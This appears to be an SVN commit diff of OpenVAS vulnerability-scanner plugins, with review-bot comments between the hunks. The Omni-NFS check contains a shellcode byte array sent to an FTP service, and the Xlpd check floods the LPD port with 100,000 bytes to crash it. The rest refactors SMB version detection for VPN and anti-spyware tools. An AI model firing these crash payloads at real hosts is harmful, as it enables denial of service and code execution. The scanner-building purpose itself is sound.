+0xb5,0x70,0x14,0x48,0x66,0xbe,0x27,0xa8,0x34,0x96,0x88,0xd5,0x1c,0x1d,0x99,0xb0, +0x9f,0x40,0x97,0xf5,0xfd,0x35,0x47,0x92,0xb1,0x41,0x4f,0x81,0xc4,0xff,0xef,0xff, +0xff,0x44,0x31,0xc9,0xbe,0x1c,0x89,0xb0,0x67,0xdb,0xda,0xd9,0x74,0x24,0xf4,0xb1, +0x02,0x58,0x31,0x70,0x13,0x83,0xc0,0x04,0x03,0x70,0x0f,0xe2,0xe9,0x08,0x74,0x33, +0xe3,0xf4,0x8a,0x70,0x9c,0xf0,0x01,0x10) + crapdata + raw_string(0x0d,0x0a); + +send(socket:soc, data:req); +close(soc); + +sleep(10); + +soc1 = open_sock_tcp(port); +if(!soc1) { + security_warning(port:port); + exit(0); + +} else { + + for(i=0;i<5;i++) { + if(!ftp_recv_line(socket:soc1)) { + security_warning(port:port); + close(soc1); + exit(0); + } + } +} + +exit(0); Property changes on: trunk/openvas-plugins/scripts/Omni_NFS_36608.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Added: trunk/openvas-plugins/scripts/Xlpd_36610.nasl =================================================================== --- trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/Xlpd_36610.nasl 2009-10-08 18:03:34 UTC (rev 5443) 
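Review bot: in Omni_NFS_36608.nasl (r5443), the post-send check calls `ftp_recv_line(socket:soc1)` up to five times on a fresh connection without sending any command, and reports on the first empty read; a server that is still running but sends one banner reply and then waits for input can fail the second read and be flagged. Read the banner once and compare it with the `XLINK` banner checked earlier. `soc1` is also never closed when all five reads succeed, and the description ends with `Risk factor : Low` although its text describes arbitrary code execution.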
@@ -0,0 +1,90 @@ +############################################################################### +# OpenVAS Vulnerability Test +# $Id$ +# +# Xlpd Remote Denial of Service Vulnerability +# +# Authors: +# Michael Meyer +# +# Copyright: +# Copyright (c) 2009 Greenbone Networks GmbH +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License version 2 +# (or any later version), as published by the Free Software Foundation. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. +############################################################################### + +if (description) +{ + script_id(100296); + script_bugtraq_id(36610); + script_version ("1.0-$Revision$"); + + script_name("Xlpd Remote Denial of Service Vulnerability"); + +desc = "Overview: +Xlpd is prone to a denial-of-service vulnerability because it fails to +adequately validate user-supplied input. + +An attacker can exploit this issue to crash the affected application, +denying service to legitimate users. Given the nature of this issue, +the attacker may also be able to run arbitrary code, but this has not +been confirmed. + +Xlpd 3.0 is vulnerable; other versions may also be affected. 
+ +References: +http://www.securityfocus.com/bid/36610 +http://www.netsarang.com/products/xlp_detail.html +http://www.securityfocus.com/archive/1/507029 + +Risk factor : Medium"; + + script_description(desc); + script_summary("Determine if Xlpd is prone to a denial-of-service vulnerability"); + script_category(ACT_DENIAL); + script_family("Denial of Service"); + script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH"); + script_dependencies("find_service.nes"); + script_require_ports("Services/lpd", 515); + exit(0); +} + +include("misc_func.inc"); + +if(safe_checks())exit(0); + +port = get_kb_item("Services/lpd"); +if(!port)port="515"; + +if(!get_port_state(port))exit(0); + +soc = open_sock_tcp(port); +if(!soc)exit(0); + +req = crap(data:raw_string(0x41),length:100000); +send(socket:soc, data:req); +close(soc); + +sleep(2); + +soc1 = open_sock_tcp(port); +if(!soc1) { + security_warning(port:port); + exit(0); +} else { + close(soc1); +} + +exit(0); + Property changes on: trunk/openvas-plugins/scripts/Xlpd_36610.nasl ___________________________________________________________________ Name: svn:keywords + Id Revision Modified: trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/cisco_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443) 
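Review bot: in Xlpd_36610.nasl (r5443), the fallback is `port="515"`, a string, where the Omni-NFS script in the same commit uses the integer form `port = 21`; use `port = 515`. Nothing before the send identifies the listener as Xlpd (the Omni-NFS script at least tests the banner for `XLINK`), and the only result test is whether `open_sock_tcp(port)` fails once, 2 seconds later, so any service on that port that refuses a single reconnect is reported. Add a service check before sending and retry the reconnect before calling security_warning.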
@@ -1,31 +1,7 @@ -# # Script Written By Ferdy Riphagen # Script distributed under the GNU GPLv2 License. -# -# Tenable grants a special exception for this plugin to use the library -# 'smb_func.inc'. This exception does not apply to any modified version of -# this plugin. -# -# kst-depend-smb +# Modified by Michael Meyer -desc = " -Synopsis : - -There is a VPN client installed on the remote Windows host. - -Description : - -The Cisco VPN Client is installed on the remote Windows host. This -software can be used for secure connectivity. - -See also : - -http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html - -Risk factor : - -None"; - if (description) { script_id(80037); script_version("$Revision: 1.5 $"); 
@@ -33,107 +9,45 @@ name = "Cisco VPN Client Version Detection"; script_name(name); + + desc = "Overview: This script is detects the installed version of Cisco VPN + Client and sets the result in KB. + + Risk Factor: Informational"; + summary = "Detects the version number of the Cisco VPN Client in use"; script_summary(summary); script_category(ACT_GATHER_INFO); - script_family("Windows"); + script_family("Service detection"); script_copyright("This script is Copyright (C) 2007 Ferdy Riphagen"); - script_require_ports(139, 445); script_dependencies("secpod_reg_enum.nasl"); script_require_keys("SMB/login", "SMB/password", "SMB/name", "SMB/transport"); exit(0); } -include("smb_func.inc"); -include("misc_func.inc"); +include("smb_nt.inc"); +include("secpod_smb_func.inc"); -login = kb_smb_login(); -pass = kb_smb_password(); -port = kb_smb_transport(); -name = kb_smb_name(); -domain = kb_smb_domain(); - -if(!get_port_state(port)) exit(0); -soc = open_sock_tcp(port); -if(!soc || (!name)) exit(0); - -function cleanup(opt) { - - if (opt == 1) exit(0); - else if (opt == 2) { - NetUseDel(); - exit(0); - } +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); } -# modified 'get_dword' to get the bytes in the right format. 
-function get_dword2(blob, pos) { - global_var blob, pos; - - if (pos > (strlen(blob) - 4)) return NULL; - return (ord(blob[pos]) << 16) + - (ord(blob[pos+1]) << 24) + - (ord(blob[pos+2])) + - (ord(blob[pos+3]) << 8); +if(!registry_key_exists(key:"SOFTWARE\Cisco Systems\VPN Client")){ + exit(0); } -session_init(socket:soc, hostname:name); -ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); -if (ipc != 1) cleanup(opt:2); - -hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE); -if (isnull(hklm)) cleanup(opt:2); - key = "SOFTWARE\Cisco Systems\VPN Client"; -regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED); -if (!isnull(regopen)) { - value = RegQueryValue(handle:regopen, item:"InstallPath"); - RegCloseKey(handle:regopen); - RegCloseKey(handle:hklm); - if(!isnull(value)) path = value[1]; - else cleanup(opt:2); -} -else cleanup(opt:2); +path = registry_get_sz(key:key, item:"InstallPath"); -share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path); -exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1vpngui.exe", string:path); - -conn = NetUseAdd(login:login, password:pass, domain:domain, share:share); -if (conn != 1) cleanup(opt:1); - -fopen = CreateFile( - file:exe, - desired_access:GENERIC_READ, - file_attributes:FILE_ATTRIBUTE_NORMAL, - share_mode:FILE_SHARE_READ, - create_disposition:OPEN_EXISTING -); - -if (isnull(fopen)) cleanup(opt:2); -ret = GetFileVersionEx(handle:fopen); -CloseFile(handle:fopen); - -if (!isnull(ret)) children = ret['Children']; -if (!isnull(children)) info = children['VarFileInfo']; -if (isnull(info)) cleanup(opt:2); - -trans = toupper(hexstr(dec2hex( - num:get_dword2( - blob:info['Translation'], pos:0)))); -if (isnull(trans)) cleanup(opt:2); - -fileinfo = children['StringFileInfo']; -if (!isnull(fileinfo)) data = fileinfo[trans]; -if (!isnull(data)) ver = data['ProductVersion']; - -if (!isnull(ver)) { - set_kb_item(name:"SMB/CiscoVPNClient/Version", value:ver); - report = string( - 
desc, "\n\n", - "Plugin output :\n\n", - "Version ", ver, " of the Cisco VPN Client is installed.\n" - ); - security_note(port:port, data:report); +if(path) +{ + file = path + "\vpngui.exe"; + version = GetVersionFromFile(file:file,verstr:"prod"); + if(!isnull(version)){ + set_kb_item(name:"SMB/CiscoVPNClient/Version", value:version); + exit(0); + } } -cleanup(opt:2); + +exit(0); Modified: trunk/openvas-plugins/scripts/secpod_smb_func.inc =================================================================== --- trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/secpod_smb_func.inc 2009-10-08 18:03:34 UTC (rev 5443) 
@@ -695,3 +695,64 @@ (ord(data[2]) << 16) + (ord(data[3]) << 24)); } } + +function GetVersionFromFile(file, verstr) { + + local_var file, share, verstr, mshare, soc, r, prot, uid, tid, ver; + + mshare = ereg_replace(pattern:"([A-Z]):.*", replace:"\1$", string:file); + file = ereg_replace(pattern:"[A-Z]:(.*)", replace:"\1", string:file); + + soc = open_sock_tcp(port); + if(!soc){ + return NULL; + } + + r = smb_session_request(soc:soc, remote:name); + if(!r) + { + close(soc); + return NULL; + } + + prot = smb_neg_prot(soc:soc); + if(!prot) + { + close(soc); + return NULL; + } + + r = smb_session_setup(soc:soc, login:login, password:pass, + domain:domain, prot:prot); + if(!r) + { + close(soc); + return NULL; + } + + uid = session_extract_uid(reply:r); + r = smb_tconx(soc:soc, name:name, uid:uid, share:mshare); + + tid = tconx_extract_tid(reply:r); + if(!tid) + { + close(soc); + return NULL; + } + fid = OpenAndX(socket:soc, uid:uid, tid:tid, file:file); + if(!fid) + { + close(soc); + return NULL; + } + if(isnull(verstr)) { + ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid); + } else { + ver = GetVersion(socket:soc, uid:uid, tid:tid, fid:fid,verstr:verstr); + } + close(soc); + + return ver; + + +} Modified: trunk/openvas-plugins/scripts/smb_explorer_version.nasl =================================================================== --- trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/smb_explorer_version.nasl 2009-10-08 18:03:34 UTC (rev 5443) 
@@ -97,7 +97,7 @@ #==================================================================# # Main code # #==================================================================# -include("smb_func.inc"); + warning = 0; access = get_kb_item("SMB/registry_full_access"); Modified: trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl =================================================================== --- trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/sonicwall_vpn_client_detect.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -1,34 +1,17 @@ # # Script Written By Ferdy Riphagen # Script distributed under the GNU GPLv2 License. -# -# Tenable grants a special exception for this plugin to use the library -# 'smb_func.inc'. This exception does not apply to any modified version of -# this plugin. -# -# kst-depend-smb +# Modified by Michael Meyer if (description) { script_id(80044); script_version("$Revision: 1.1 $"); - desc = " -Synopsis : + desc = "Overview: This script detects the installed version of +SonicWall Global VPN Client and sets the result in KB. -There is a VPN client installed on the remote host. +Risk Factor: Informational"; -Description : - -The SonicWall Global VPN Client is installed on the remote system. This -software can be used to establish secure remote connections. - -See also : - -http://www.sonicwall.com/ - -Risk factor : - -None"; script_description(desc); name = "SonicWall Global VPN Client Detection"; @@ -37,7 +20,7 @@ script_summary(summary); script_category(ACT_GATHER_INFO); - script_family("Windows"); + script_family("Service detection"); script_copyright("This script is Copyright (C) 2008 Ferdy Riphagen"); script_require_ports(139, 445); 
@@ -46,83 +29,30 @@ exit(0); } -include("smb_func.inc"); -include("misc_func.inc"); +include("smb_nt.inc"); +include("secpod_smb_func.inc"); -login = kb_smb_login(); -pass = kb_smb_password(); -port = kb_smb_transport(); -name = kb_smb_name(); -domain = kb_smb_domain(); - -if(!get_port_state(port)) exit(0); -soc = open_sock_tcp(port); -if(!soc || (!name)) exit(0); - -session_init(socket:soc, hostname:name); -ipc = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); -if (ipc != 1) exit(0); - -hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE); -if (isnull(hklm)) { - NetUseDel(); - exit(0); +if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); } -path = NULL; key = "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\SWGVpnClient.exe"; -regopen = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED); -if (!isnull(regopen)) { - value = RegQueryValue(handle:regopen, item:"Path"); - RegCloseKey(handle:regopen); - RegCloseKey(handle:hklm); - if(!isnull(value)) path = value[1]; -} -if (isnull(path)) { - RegCloseKey(handle:hklm); - NetUseDel(); - exit(0); -} -share = ereg_replace(pattern:"^([A-Za-z]):.*", replace:"\1$", string:path); -exe = ereg_replace(pattern:"^[A-Za-z]:(.*)", replace:"\1\SWGVpnClient.exe", string:path); - -conn = NetUseAdd(login:login, password:pass, domain:domain, share:share); -if (conn != 1) { - NetUseDel(); - exit(0); +if(!registry_key_exists(key:key)){ + exit(0); } -fopen = CreateFile( - file:exe, - desired_access:GENERIC_READ, - file_attributes:FILE_ATTRIBUTE_NORMAL, - share_mode:FILE_SHARE_READ, - create_disposition:OPEN_EXISTING -); +path = registry_get_sz(key:key, item:"Path"); -if (isnull(fopen)) { - NetUseDel(); - exit(0); -} +if(path) { -ret = GetFileVersion(handle:fopen); -CloseFile(handle:fopen); -NetUseDel(); + file = path + "\SWGVpnClient.exe"; + version = GetVersionFromFile(file:file,verstr:"prod"); + if(!isnull(version)){ + set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:version); + 
set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path); + exit(0); + } +} -if (!isnull(ret)) -{ - ver = string(ret[0] + '.' + ret[1] + '.' + ret[2] + '.' + ret[3]); - - set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Version", value:ver); - set_kb_item(name:"SMB/SonicWallGlobalVPNClient/Path", value:path); - - report = string("\n", - "Version ", ver, " of the SonicWall Global VPN Client is installed\n", - "under :\n", - "\n", - " ", path - ); - security_note(port:port, extra:report); -} exit(0); Modified: trunk/openvas-plugins/scripts/spybot_detection.nasl =================================================================== --- trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 12:27:43 UTC (rev 5442) +++ trunk/openvas-plugins/scripts/spybot_detection.nasl 2009-10-08 18:03:34 UTC (rev 5443) @@ -1,15 +1,9 @@ # # (C) Josh Zlatin-Amishav and Tenable Network Security # GPLv2 -# -# Tenable grants a special exception for this plugin to use the library -# 'smb_func.inc'. This exception does not apply to any modified version of -# this plugin. -# -# kst-depend-smb +# Modified by Michael Meyer - desc = " -Synopsis : + desc = "Synopsis : The remote Windows host has a spyware detection program installed on it. @@ -20,11 +14,9 @@ kinds from your computer. See also : - http://www.safer-networking.org/ Risk factor : - None"; if(description) 
@@ -34,195 +26,175 @@ name = "Spybot Search & Destroy Detection"; script_name(name); - + script_description(desc); - + summary = "Checks whether Spybot Search & Destroy is installed"; script_summary(summary); script_category(ACT_GATHER_INFO); - + script_copyright("This script is Copyright (C) 2006 Josh Zlatin-Amishav and Tenable Network Security"); - family = "Windows"; + family = "Service detection"; script_family(family); - + script_dependencies("secpod_reg_enum.nasl"); - script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport"); + script_require_keys("SMB/name", "SMB/login", "SMB/password", "SMB/transport"); script_require_ports(139, 445); exit(0); } +include("smb_nt.inc"); +include("secpod_smb_func.inc"); +include("global_settings.inc"); -include("smb_func.inc"); -include("secpod_reg.inc"); + if(!get_kb_item("SMB/WindowsVersion")){ + exit(0); + } + name = kb_smb_name(); + login = kb_smb_login(); + pass = kb_smb_password(); + domain = kb_smb_domain(); + port = kb_smb_transport(); -name = kb_smb_name(); -login = kb_smb_login(); -pass = kb_smb_password(); -domain = kb_smb_domain(); -port = kb_smb_transport(); + if(!port) port = 139; + if(!get_port_state(port))exit(0); -if(!get_port_state(port))exit(0); -soc = open_sock_tcp(port); -if(!soc)exit(1); + soc = open_sock_tcp(port); + if(!soc){ + exit(0); + } -session_init(socket:soc, hostname:name); -r = NetUseAdd(login:login, password:pass, domain:domain, share:"IPC$"); -if ( r != 1 ) -{ - NetUseDel(); - exit(0); -} + r = smb_session_request(soc:soc, remote:name); + if(!r) + { + close(soc); + exit(0); + } + prot = smb_neg_prot(soc:soc); + if(!prot) + { + close(soc); + exit(0); + } -# First find where the executable is installed on the remote host -# Connect to remote registry. 
-hklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE); -if (isnull(hklm)) -{ - if (log_verbosity > 1) debug_print("can't connect to the remote registry!", level:0); - NetUseDel(); - exit(0); -} + r = smb_session_setup(soc:soc, login:login, password:pass, + domain:domain, prot:prot); + if(!r) + { + close(soc); + exit(0); + } + uid = session_extract_uid(reply:r); + r = smb_tconx(soc:soc, name:name, uid:uid, share:"IPC$"); + tid = tconx_extract_tid(reply:r); + if(!tid) + { + close(soc); + exit(0); + } -# Determine where Spybot S&D is installed -key = "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Spybot - Search & Destroy_is1"; -key_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED); -if (!isnull(key_h)) { - value = RegQueryValue(handle:key_h, item:"Inno Setup: App Path"); - if (!isnull(value)) path = value[1]; - else path = NULL; - - RegCloseKey(handle:key_h); -} -else path = NULL; -RegCloseKey(handle:hklm); + r = smbntcreatex(soc:soc, uid:uid, tid:tid, name:"\winreg"); + if(!r) + { + close(soc); + exit(0); + } -if (isnull(path)) { - NetUseDel(); - exit(0); -} + pipe = smbntcreatex_extract_pipe(reply:r); + if(!pipe) + { + close(soc); + exit(0); + } + r = pipe_accessible_registry(soc:soc, uid:uid, tid:tid, pipe:pipe); + if(!r) + { +
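Review bot: in Xlpd_36610.nasl, the check after `sleep(2)` reports the host as vulnerable on a single failed `open_sock_tcp(port)`, so a transient connect failure or a service that is slow to accept connections again is reported the same way as a crash. Retry the connect a few times before calling `security_warning`. The fallback `if(!port)port="515";` also assigns a string where `script_require_ports("Services/lpd", 515)` uses an integer; `port = 515;` would be consistent.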
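Review bot: in cisco_vpn_client_detect.nasl, `file = path + "\vpngui.exe";` inserts a separator that the removed code did not (its replacement string was `"\1vpngui.exe"`), so if `InstallPath` ends in a backslash, as the old code assumed, the file name now carries a doubled separator. Strip a trailing backslash from `path` before concatenating, or keep the old form. The new `desc` reads "This script is detects", and `script_require_ports(139, 445)` is dropped here while the SonicWall script in the same commit keeps it; the two should agree.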
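Review bot: GetVersionFromFile in secpod_smb_func.inc reads `port`, `name`, `login`, `pass` and `domain`, none of which are parameters or listed in `local_var`, while the Cisco and SonicWall callers in this same commit delete their `kb_smb_*()` assignments. Unless something else sets those names, the function works with unset values; fetch them inside the function (as spybot_detection.nasl does with `kb_smb_name()` and the related calls) or pass them in. `fid` is missing from `local_var` and `share` is declared but never used. The patterns `([A-Z]):.*` and `[A-Z]:(.*)` also lose the `^` anchor and the lowercase range of the removed `^([A-Za-z]):.*`, so a path with a lowercase drive letter is no longer rewritten to a share name.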
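Review bot: in sonicwall_vpn_client_detect.nasl, the value stored in `SMB/SonicWallGlobalVPNClient/Version` may change meaning: the removed code built it from `GetFileVersion` as a four-part `ret[0]` to `ret[3]` string, while the new call requests `verstr:"prod"`. If the product string differs from the file version, any plugin comparing this KB entry against the old format needs checking, so either confirm the two match for this client or document the change. With `security_note` removed, the script also no longer reports the install path to the user, only to the KB.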
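Review bot: spybot_detection.nasl open-codes the `open_sock_tcp`, `smb_session_request`, `smb_neg_prot`, `smb_session_setup` and `smb_tconx` sequence that this commit also adds to GetVersionFromFile, each step with its own `close(soc); exit(0);` block; a shared session helper in secpod_smb_func.inc would remove the duplication. The reply from `smb_tconx` goes to `tconx_extract_tid` without the `if(!r)` check used for the other calls, and the failed-socket path changes from `exit(1)` to `exit(0)`, which should be confirmed as intended.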

OpenVAS-Server is a forked development of Nessus 2.2. The fork happened because Nessus 3 changed to a proprietary license model. Nessus 2.2.x development stopped for third party contributors. @@ -72,7 +79,7 @@ mailing list and ask for support there.